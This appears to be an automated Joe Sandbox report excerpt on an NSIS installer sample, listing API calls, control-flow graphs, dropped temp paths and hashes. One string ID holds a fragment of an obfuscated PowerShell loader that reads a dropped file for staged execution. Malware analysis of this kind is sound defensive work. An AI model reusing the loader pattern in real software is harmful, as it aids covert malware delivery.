                                                                Control-flow Graph

                                                                APIs
                                                                • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004063E7
                                                                • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,00405323,Completed,00000000), ref: 004063FA
                                                                • SHGetSpecialFolderLocation.SHELL32(00405323,00410EA0,00000000,Completed,?,00405323,Completed,00000000), ref: 00406436
                                                                • SHGetPathFromIDListW.SHELL32(00410EA0,: Completed), ref: 00406444
                                                                • CoTaskMemFree.OLE32(00410EA0), ref: 0040644F
                                                                • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406475
                                                                • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,00405323,Completed,00000000), ref: 004064CD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                • String ID: "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.S$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                • API String ID: 717251189-1264129387
                                                                • Opcode ID: e482eba231f8f4520b3a73f5e1a7f8ad6871b3a875979b684132498817419dc4
                                                                • Instruction ID: e6e4ebc4b258379f565b747a0f7be2a01952c0151b7e77293941e8e44b6b8026
                                                                • Opcode Fuzzy Hash: e482eba231f8f4520b3a73f5e1a7f8ad6871b3a875979b684132498817419dc4
                                                                • Instruction Fuzzy Hash: 12611171A00215ABDF209F64CC40AAE37A5AF54314F22813FE947BB2D0D77D5AA2CB5D

                                                                APIs
                                                                • lstrcatW.KERNEL32(00000000,00000000,Polystichoid,C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne,?,?,00000031), ref: 004017B0
                                                                • CompareFileTime.KERNEL32(-00000014,?,Polystichoid,Polystichoid,00000000,00000000,Polystichoid,C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne,?,?,00000031), ref: 004017D5
                                                                  • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                  • Part of subcall function 004052EC: lstrlenW.KERNEL32(Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                  • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                  • Part of subcall function 004052EC: lstrcatW.KERNEL32(Completed,0040324F,0040324F,Completed,00000000,00410EA0,004030B0), ref: 00405347
                                                                  • Part of subcall function 004052EC: SetWindowTextW.USER32(Completed,Completed), ref: 00405359
                                                                  • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                  • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                  • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                • String ID: C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne$C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini$Polystichoid$nerveklinikkernes
                                                                • API String ID: 1941528284-484877454
                                                                • Opcode ID: f8428ececabf4161325116f3acae4040179a1912e67cedcda78f44ceba6070dd
                                                                • Instruction ID: 128eea75dfaaf3eda36781b62dd3037428c7b97943fe82b2985fb16c69cf4114
                                                                • Opcode Fuzzy Hash: f8428ececabf4161325116f3acae4040179a1912e67cedcda78f44ceba6070dd
                                                                • Instruction Fuzzy Hash: C541A031900519BFCF10BBA5CD46EAE3679EF45328B20427FF412B10E1CA3C8A519A6E

                                                                APIs
                                                                • lstrlenW.KERNEL32(Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                • lstrlenW.KERNEL32(0040324F,Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                • lstrcatW.KERNEL32(Completed,0040324F,0040324F,Completed,00000000,00410EA0,004030B0), ref: 00405347
                                                                • SetWindowTextW.USER32(Completed,Completed), ref: 00405359
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                • String ID: Completed
                                                                • API String ID: 2531174081-3087654605
                                                                • Opcode ID: 4b00a31e1e5ea89d2dd6f616c58afdbca4195894880e32749fa2d66186394066
                                                                • Instruction ID: 5cbdc996bc9841dedcc8c590482a37e7ed43af3164ff52369f5afd8429117419
                                                                • Opcode Fuzzy Hash: 4b00a31e1e5ea89d2dd6f616c58afdbca4195894880e32749fa2d66186394066
                                                                • Instruction Fuzzy Hash: FA219D71900618BBDB11AF96DD849CFBF78EF45354F50807AF904B62A0C3B94A50CFA8

                                                                APIs
                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                • wsprintfW.USER32 ref: 00406640
                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                • API String ID: 2200240437-1946221925
                                                                • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                • Instruction ID: 0a3accc906e0554885a7c349f3439cc1632e9825758041c21a8046ddc9b1cf8d
                                                                • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                • Instruction Fuzzy Hash: 28F0217050111967CB10EB64DD0DFAB3B6CA700304F10487AA547F10D1EBBDDB64CB98

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: CountTick$wsprintf
                                                                • String ID: ... %d%%
                                                                • API String ID: 551687249-2449383134
                                                                • Opcode ID: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                                                • Instruction ID: eb9965c025c0ad248c1811abffb3300191da1be904cace2ded6344ef59bce26d
                                                                • Opcode Fuzzy Hash: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                                                • Instruction Fuzzy Hash: 97516B71900219EBCB10DF65EA44A9F3BA8AF44766F1441BFFC04B72C1C7789E518BA9

                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 00405DC7
                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00403357,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035A3), ref: 00405DE2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: CountFileNameTempTick
                                                                • String ID: "C:\Users\user\Desktop\TVPfW4WUdj.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                • API String ID: 1716503409-2146733357
                                                                • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                • Instruction ID: 8d675393d4be3a1a13ee7cec111603dd999094634a9ab4ae6aafa5463bef85a0
                                                                • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                • Instruction Fuzzy Hash: 9BF03076A00304FBEB00DF69DD09E9BB7A9EF95710F11803BE900E7250E6B09954DB64

                                                                APIs
                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini,00000023,00000011,00000002), ref: 0040242F
                                                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini,00000000,00000011,00000002), ref: 0040246F
                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini,00000000,00000011,00000002), ref: 00402557
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: CloseValuelstrlen
                                                                • String ID: C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini
                                                                • API String ID: 2655323295-919467500
                                                                • Opcode ID: 58e8d34890d429fdc95bed5fa579bd7a10b097d43d2a2625128ce20b791e1a8c
                                                                • Instruction ID: a134a75014e9aaf936f4ed277425746fec7608ee04f1c2dd62efd2514dae3daa
                                                                • Opcode Fuzzy Hash: 58e8d34890d429fdc95bed5fa579bd7a10b097d43d2a2625128ce20b791e1a8c
                                                                • Instruction Fuzzy Hash: 15118471D00104BEEB10AFA5DE89EAEBA74EB44754F11803BF504B71D1D7B88D419B68

                                                                Control-flow Graph

                                                                control_flow_graph 681 402d44-402d6d call 4060f1 683 402d72-402d74 681->683 684 402d76-402d7c 683->684 685 402dec-402df0 683->685 686 402d98-402dad RegEnumKeyW 684->686 687 402d7e-402d80 686->687 688 402daf-402dc1 RegCloseKey call 40665e 686->688 689 402dd0-402dde RegCloseKey 687->689 690 402d82-402d96 call 402d44 687->690 695 402de0-402de6 RegDeleteKeyW 688->695 696 402dc3-402dce 688->696 689->685 690->686 690->688 695->685 696->685
                                                                APIs
                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                Similarity
                                                                • API ID: Close$Enum
                                                                • String ID:
                                                                • API String ID: 464197530-0
                                                                • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                • Instruction ID: 673fb129a4d8ab743942914098bbacbd975ea3c1b6875aa08396d434171036d0
                                                                • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                • Instruction Fuzzy Hash: C7116A32500108FBDF02AB90CE09FEE7B7DAF54340F100076B905B51E0EBB59E21AB58

                                                                Control-flow Graph

                                                                control_flow_graph 782 4015c1-4015d5 call 402c41 call 405c04 787 401631-401634 782->787 788 4015d7-4015ea call 405b86 782->788 790 401663-402250 call 401423 787->790 791 401636-401655 call 401423 call 406284 SetCurrentDirectoryW 787->791 796 401604-401607 call 405838 788->796 797 4015ec-4015ef 788->797 803 402ac5-402ad4 790->803 804 40288b-402892 790->804 791->803 809 40165b-40165e 791->809 807 40160c-40160e 796->807 797->796 800 4015f1-4015f8 call 405855 797->800 800->796 815 4015fa-401602 call 4057bb 800->815 804->803 811 401610-401615 807->811 812 401627-40162f 807->812 809->803 813 401624 811->813 814 401617-401622 GetFileAttributesW 811->814 812->787 812->788 813->812 814->812 814->813 815->807
                                                                APIs
                                                                  • Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,75573420,004059B6,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405C12
                                                                  • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
                                                                  • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F
                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                  • Part of subcall function 004057BB: CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057FE
                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne,?,00000000,000000F0), ref: 0040164D
                                                                Strings
                                                                • C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne, xrefs: 00401640
                                                                Similarity
                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                • String ID: C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne
                                                                • API String ID: 1892508949-334597386
                                                                • Opcode ID: ddfeeda49915d85a532ba335a3f5d96bf8af22eec7216368a20200d1754f1dc9
                                                                • Instruction ID: cdbb32f604e1e97b4505581c5a6dce2e2be8be56f1f537164db10111f90f244e
                                                                • Opcode Fuzzy Hash: ddfeeda49915d85a532ba335a3f5d96bf8af22eec7216368a20200d1754f1dc9
                                                                • Instruction Fuzzy Hash: 5911D031504501EBCF30BFA4CD4199F36A0EF14329B29493BFA45B22F1DB3E49519A5E
                                                                APIs
                                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,004063C6,80000002), ref: 00406198
                                                                • RegCloseKey.KERNELBASE(?,?,004063C6,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 004061A3
                                                                Strings
                                                                Similarity
                                                                • API ID: CloseQueryValue
                                                                • String ID: : Completed
                                                                • API String ID: 3356406503-2954849223
                                                                • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                • Instruction ID: bbbd3ef8f6d6f34ea5303db1c751cd258066777a1c36f61d7f193cbbff11b307
                                                                • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                • Instruction Fuzzy Hash: B701BC32510209EBDF21CF50CD09EDF3BA8EB04360F01803AFD06A6191D738DA68CBA4
                                                                APIs
                                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
                                                                • CloseHandle.KERNEL32(?), ref: 004058A3
                                                                Strings
                                                                • Error launching installer, xrefs: 00405880
                                                                Similarity
                                                                • API ID: CloseCreateHandleProcess
                                                                • String ID: Error launching installer
                                                                • API String ID: 3712363035-66219284
                                                                • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                • Instruction ID: 38a1dae354cb2a4c5fc32891eb37452fbeb174cf60b6e0268020382365bb363f
                                                                • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                • Instruction Fuzzy Hash: FFE0BFB560020ABFFB10AF64ED05F7B7AACFB14704F414535BD51F2150D7B898158A78
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                • Instruction ID: 28e39518df3801c38e3280a2e83f64e055c3b15caa2ea9a1a3761292ca1e3da9
                                                                • Opcode Fuzzy Hash: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                • Instruction Fuzzy Hash: F9A15371E04229CBDB28CFA8C8547ADBBB1FF44305F10816ED456BB281C7786A86DF45
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                • Instruction ID: 90999bc76b255a60827136b2fd47affe8781ac3d45706895e3c6f95813f0c94e
                                                                • Opcode Fuzzy Hash: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                • Instruction Fuzzy Hash: 21913F71D04229CBDB28CF98C8547ADBBB1FF44305F14816ED456BB291C378AA86DF45
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                • Instruction ID: 7ab5a6fdb7118453f5bc4abdeeb58a7f0a93ca16cb9ae78d5f3cb9c6a39904d0
                                                                • Opcode Fuzzy Hash: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                • Instruction Fuzzy Hash: 8E814471E04229DBDF24CFA8C8447ADBBB1FF44301F24816AD456BB291C778AA86DF15
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                APIs
                                                                • GlobalFree.KERNEL32(00000000), ref: 00401BE7
                                                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                Similarity
                                                                • API ID: Global$AllocFree
                                                                • String ID: Polystichoid
                                                                • API String ID: 3394109436-2603710711
                                                                APIs
                                                                  • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                  • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                • GetFileVersionInfoSizeW.KERNELBASE(00000009,00000000,?,000000EE), ref: 00401FA2
                                                                • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FC1
                                                                  • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                Similarity
                                                                • API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
                                                                • String ID:
                                                                • API String ID: 2520467145-0
                                                                APIs
                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                APIs
                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                Similarity
                                                                • API ID: CloseDeleteValue
                                                                • String ID:
                                                                • API String ID: 2831762973-0
                                                                APIs
                                                                Similarity
                                                                • API ID: ShowWindow
                                                                • String ID:
                                                                • API String ID: 1268545403-0
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                  • Part of subcall function 004065EE: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                  • Part of subcall function 004065EE: wsprintfW.USER32 ref: 00406640
                                                                  • Part of subcall function 004065EE: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                Similarity
                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                • String ID:
                                                                • API String ID: 2547128583-0
                                                                • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                • Instruction ID: b981dfd93ec331c3b9a34c40441268954a5fd10c61cb517d904db4ec9094c3f9
                                                                • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                • Instruction Fuzzy Hash: DFE08C326042116BD7159B70AE4487B63AC9A89650307883EFD4AF2181EB39EC31A66D
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                Similarity
                                                                • API ID: File$AttributesCreate
                                                                • String ID:
                                                                • API String ID: 415043291-0
                                                                • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,?,0040595A,?,?,00000000,00405B30,?,?,?,?), ref: 00405D5A
                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6E
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                • Instruction ID: a3d3d340e07fbe3a7a5d47ed685d46f7c513eabc37ca73d627b83f1c605c53fe
                                                                • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                • Instruction Fuzzy Hash: DFD0C972504820ABC6512728EF0C89BBB95DB542717028B35FAA9A22B0DB304C568A98
                                                                APIs
                                                                • CreateDirectoryW.KERNELBASE(?,00000000,0040334C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040583E
                                                                • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040584C
                                                                Similarity
                                                                • API ID: CreateDirectoryErrorLast
                                                                • String ID:
                                                                • API String ID: 1375471231-0
                                                                • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
